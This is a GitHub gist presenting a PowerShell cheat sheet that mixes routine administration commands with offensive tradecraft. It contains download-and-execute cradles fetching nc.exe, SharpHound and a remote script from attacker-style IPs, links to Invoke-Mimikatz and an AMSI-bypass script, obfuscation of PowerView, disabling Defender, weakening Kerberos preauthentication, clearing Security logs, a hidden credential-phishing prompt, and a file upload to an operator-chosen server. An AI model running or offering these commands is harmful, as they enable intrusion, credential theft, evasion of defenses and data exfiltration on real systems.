Skip to content

Instantly share code, notes, and snippets.

@aw-junaid

aw-junaid/PowerShell.md

Created January 30, 2026 17:59
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save aw-junaid/0a041fb58f67bd73943381651c364048 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save aw-junaid/0a041fb58f67bd73943381651c364048 to your computer and use it in GitHub Desktop.
Download ZIP
PowerShell quick reference for help/discovery, services/processes/WMI, PS version, drives, DNS lookups, downloading files, credentials prompts, basic network tests, event log queries, scheduled execution patterns, and PSRemoting basics. Cleaned syntax.
Raw
PowerShell.md

PowerShell Environment Commands & Snippets

PowerShell quick reference for help/discovery, services/processes/WMI, PS version, drives, DNS lookups, downloading files, credentials prompts, basic network tests, event log queries, scheduled execution patterns, and PSRemoting basics. Cleaned syntax.

PowerShell basics / discovery

  • Stop-Transcript

    Stops a PowerShell transcript session (if Start-Transcript was enabled).

  • Get-Content file

    Prints file contents (like cat). Use -Tail 50 -Wait to follow logs.

  • Get-Help command -Examples

    Shows usage examples for a cmdlet.

  • Get-Command *string*

    Finds commands matching a pattern (cmdlets/functions/aliases).
    (Your get-command 'string' works too; wildcard form is more useful.)

  • Get-Service

    Lists services.

  • Get-WmiObject -Class Win32_Service

    Lists services via WMI (includes extra fields like PathName, StartName).

  • $PSVersionTable

    Shows PowerShell version and environment details.

  • powershell.exe -Version 2.0

    Starts PowerShell using version 2 (only works if v2 engine is installed/enabled).

Output/inspection helpers

  • Get-Service | Measure-Object

    Counts objects returned (service count).

  • Get-PSDrive

    Shows PS drives (filesystem, registry hives, env:, cert:, etc.).

  • Get-Process | Select-Object -ExpandProperty Name

    Lists process names only.

  • Get-Help -Parameter Credential

    Shows help entries mentioning the -Credential parameter.

  • Get-WmiObject -List | Where-Object { $_.Name -match 'network' }

    Finds WMI classes related to “network”.
    (Your -'network' corrected.)

DNS / name lookups

  • [System.Net.Dns]::GetHostEntry("ip_or_host")
    Resolves an IP/hostname and returns host entry information.
    (Your [Net.DNS]::GethostEntry(...) corrected to the full type name and proper syntax.)

Downloading files / executing remote content

  • powershell.exe -Command "Invoke-WebRequest 'http://10.10.10.10/nc.exe' -OutFile 'C:\Temp\nc.exe'"

    Downloads a file to disk using Invoke-WebRequest.

  • powershell.exe -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.10.10:8000/p')"

    Downloads a script as text and executes it in memory (IEX).

  • URLs you listed (PS1 sources)

    • https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18...

    • https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

    These are remote script locations that can be fetched with Invoke-WebRequest/WebClient.

Calling PS1 files

  • . .\script.ps1

    Dot-sources a script (loads functions into the current session).

  • & .\script.ps1

    Executes a script in a child scope.

AMSI / obfuscation

  • Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1

    Loads the module.

  • Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out.ps1

    Generates an obfuscated output script and writes it to out.ps1.

  • https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1

    Remote script link you listed.

  • . .\AMSI-Bypass.ps1
Invoke-AmsiBypass

    Dot-source then run the function.

Disable realtime monitoring (Defender)

  • powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    Toggles Defender realtime monitoring setting (requires appropriate privileges and Defender presence).

DirectoryServices searchers (users/computers)

  • $users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ""
$users.FindAll()

    Searches directory for user objects (SearchRoot must be set properly for real results).

  • $computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ""
$computers.FindAll()

    Searches directory for computer objects.

AD setting (as written)

  • Set-ADAccountControl -Identity jorden -DoesNotRequirePreAuth 1
    Sets the “Does not require Kerberos preauthentication” flag for an AD account (requires RSAT/ActiveDirectory module + permissions).

Event logs (query/clear)

  • Get-EventLog -List

    Lists classic event logs.

  • Clear-EventLog -LogName Application, Security -ComputerName SVR01

    Clears Application and Security logs on remote computer SVR01 (requires permissions).

Export OS version to CSV

  • Get-WmiObject -Class Win32_OperatingSystem |
  Select-Object * |
  Export-Csv C:\os.csv -NoTypeInformation
    Exports OS information to CSV.
    (Your pipe/select/export corrected and output file made .csv.)

List running services

  • Get-Service | Where-Object { $_.Status -eq "Running" }
    Shows only running services.

Persistent PSDrive mapping (share)

  • New-PSDrive -Persist -PSProvider FileSystem -Root \\1.1.1.1\tools -Name i
    Maps a persistent drive i: to the SMB share.

Files written after a specific date

  • Get-ChildItem -Path C:\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue |
  Where-Object { $_.LastWriteTime -gt "2012-08-20" }
    Finds .log files modified after the given date.

Download file from HTTP to destination

  • (New-Object System.Net.WebClient).DownloadFile("url","dest")
    Downloads a URL directly to a local path.

TCP port connections (simple scanner)

  • $ports = @(80,443,445)
$ip = "x.x.x.x"

foreach ($port in $ports) {
  try {
    $socket = New-Object System.Net.Sockets.TcpClient($ip,$port)
    "$ip:$port - Open"
    $socket.Close()
  } catch {
    "$ip:$port - Closed"
  }
}
    Attempts to connect to each port and reports open/closed.

Ping with 500ms timeout

  • $ping = New-Object System.Net.NetworkInformation.Ping
$ping.Send("ip",500)
    Sends a ping with a 500 ms timeout.
    (Your 5JO corrected to 500 and type name corrected.)

Credential prompt window

  • powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential("title","message","user","domain")
    Starts PowerShell hidden and prompts for credentials via UI.

Run an EXE every 4 hours in a date/time window (as given, corrected)

  • powershell.exe -Command "do { if ((Get-Date -Format yyyyMMdd-HHmm) -match '201308(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]') { Start-Process -WindowStyle Hidden 'C:\Temp\my.exe'; Start-Sleep -Seconds 14400 } } while ($true)"
    Loops forever; during the matching date/time window it runs my.exe then sleeps 4 hours.

Start PowerShell as another user (credential object)

  • $pw = ConvertTo-SecureString -String "PASSWORD" -AsPlainText -Force
$pp = New-Object System.Management.Automation.PSCredential("DOMAIN\user", $pw)

Start-Process powershell -Credential $pp -ArgumentList '-NoProfile -Command &{Start-Process file.exe -Verb RunAs}'
    Creates PSCredential and launches a new PowerShell process under that identity.

Upload/download with iwr (Invoke-WebRequest)

  • powershell iwr -UseBasicParsing http://192.168.2.x/SharpHound.exe -OutFile .\SharpHound.exe
    Downloads SharpHound.exe to current directory.

Email sender

  • powershell.exe Send-MailMessage -To "email" -From "email" -Subject "Subject" -Attachments "attachment file path" -Body "Body" -SmtpServer TargetEmailServerIP
    Sends an email with an attachment through the specified SMTP server.

Enable PSRemoting remotely (scheduled)

  • net time \\ip

    Checks remote time (often used when scheduling).

  • at \\ip time "PowerShell -Command ""Enable-PSRemoting -Force"""

    Schedules enabling PSRemoting on the remote host.

  • at \\ip time+1 "PowerShell -Command ""Set-Item wsman:\localhost\client\trustedhosts '*'"""

    Schedules setting TrustedHosts.

  • at \\ip time+2 "PowerShell -Command ""Restart-Service WinRM"""

    Schedules restarting WinRM.

  • Enter-PSSession -ComputerName ip -Credential username

    Enters a remote interactive PowerShell session.

Hostname and IP list from MicrosoftDNS WMI

  • Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "DomainName='DOMAIN'" |
  Select-Object TextRepresentation
    Queries DNS records from a domain controller’s Microsoft DNS provider and prints textual record data.

Download from PowerShell from a specific HTTPS path (ignore cert)

  • powershell.exe -NoProfile -NonInteractive -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source='https://YOUR_SPECIFIED_IP/file.zip'; $destination='C:\master.zip'; $http = New-Object System.Net.WebClient; $http.DownloadFile($source,$destination)"
    Downloads a file from HTTPS while bypassing certificate validation.

Send a file via HTTP POST (UploadFile)

  • powershell.exe -NoProfile -NonInteractive -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server='http://YOUR_SPECIFIED_IP/folder'; $filepath='C:\master.zip'; $http = New-Object System.Net.WebClient; $http.UploadFile($server,$filepath)"
    Uploads a local file to a web server endpoint via an HTTP POST request.

Useful additions for PowerShell environment

  • Get-ExecutionPolicy -List

    Shows execution policy scopes.

  • Set-ExecutionPolicy -Scope Process Bypass -Force

    Sets bypass only for the current process.

  • Get-ChildItem Env:

    Lists environment variables.

  • Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run

    Lists common persistence/run keys.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment